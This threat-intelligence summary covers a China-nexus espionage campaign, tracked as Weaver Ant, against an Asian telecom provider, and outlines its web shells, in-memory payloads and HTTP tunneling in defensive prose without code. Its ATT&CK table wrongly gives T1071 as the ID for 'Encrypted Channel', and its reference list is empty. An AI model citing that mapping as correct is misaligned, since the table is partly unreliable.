EXECUTIVE SUMMARY
A cyber espionage campaign targeted a major telecommunications provider in Asia, orchestrated by a China-nexus threat actor tracked as Weaver Ant. The attack involved persistent access through web shells, enabling data collection and lateral movement. The intrusion was first detected when an old, compromised account was re-enabled, leading to an extensive forensic investigation. Security analysts discovered a variant of the China Chopper web shell embedded within an internal server for several years. This finding revealed a second ongoing cyber operation that had been unnoticed. Utilizing advanced detection methods like YARA rules, the investigators identified numerous web shells deployed across the network, forming a larger cyber espionage campaign. The attackers leveraged web shell tunneling to move laterally within different network segments while bypassing security measures.
The analysis uncovered two primary web shells: an encrypted China Chopper and a custom-built INMemory web shell. The China Chopper variant was designed to bypass web application firewalls (WAFs) by using encrypted payloads and strategic evasion techniques. Meanwhile, the INMemory web shell executed payloads entirely in memory, utilizing a Base64-encoded Portable Executable (PE) to avoid disk-based detection. These tools enabled attackers to maintain persistent access, execute remote commands, and deploy additional payloads without raising alarms. Another stealth technique involved recursive HTTP tunneling, allowing compromised machines to function as proxy servers for redirecting command traffic. By mirroring network traffic, investigators managed to capture encrypted payloads and decrypt them, exposing the full scope of the operation. The investigation revealed an intricate, multi-layered attack strategy where each compromised machine acted as a stepping stone to another, demonstrating the adversary’s high level of sophistication and adaptability.
The discovery of this intrusion highlighted the evolving nature of cyber threats targeting critical infrastructure. The attackers implemented multiple layers of encryption, obfuscation, and stealth tactics to ensure prolonged access without detection. Their ability to manipulate legitimate web traffic and bypass security mechanisms demonstrated the necessity for organizations to adopt a multi-faceted security approach. Advanced forensic analysis techniques, such as network traffic decryption and automated payload analysis, proved essential in unravelling the attack's complexity. The campaign also revealed the adversary’s intent to maintain access to compromised networks over extended periods. As a result, defensive strategies must evolve to counter these adaptive threats, integrating continuous monitoring, endpoint security enhancements, and proactive threat intelligence to detect and disrupt similar operations before they cause significant damage.
THREAT PROFILE:
| Tactics | Technique ID | Technique |
| Persistence | T1505 | Server Software Component |
| Execution | T1059 | Command and Scripting Interpreter |
| T1203 | Exploitation for Client Execution | |
| Defense Evasion | T1140 | Deobfuscate or Decode Files or Information |
| T1562 | Impair Defenses | |
| T1027 | Obfuscated Files or Information | |
| Credential Access | T1552 | Unsecured Credentials |
| Lateral Movement | T1570 | Lateral Tool Transfer |
| T1071 | Application Layer Protocol | |
| Collection | T1005 | Data from Local System |
| Command and Control | T1071 | Encrypted Channel |
| Exfiltration | T1041 | Exfiltration Over C2 Channel |
REFERENCES:
The following reports contain further technical details: